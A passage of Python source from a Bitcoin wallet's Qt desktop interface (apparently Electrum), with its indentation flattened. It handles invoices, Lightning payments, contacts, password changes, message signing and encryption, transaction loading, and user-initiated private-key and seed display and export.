self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.lightning_button = None
if self.wallet.has_lightning():
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
self.update_lightning_icon()
sb.addPermanentWidget(self.lightning_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if self.lightning_button is None:
return
if self.network.lngossip is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
grid.addWidget(QLabel(_('Enabled')), 5, 1)
local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey))
local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse)
grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0)
grid.addWidget(local_nodeid, 6, 1, 1, 3)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
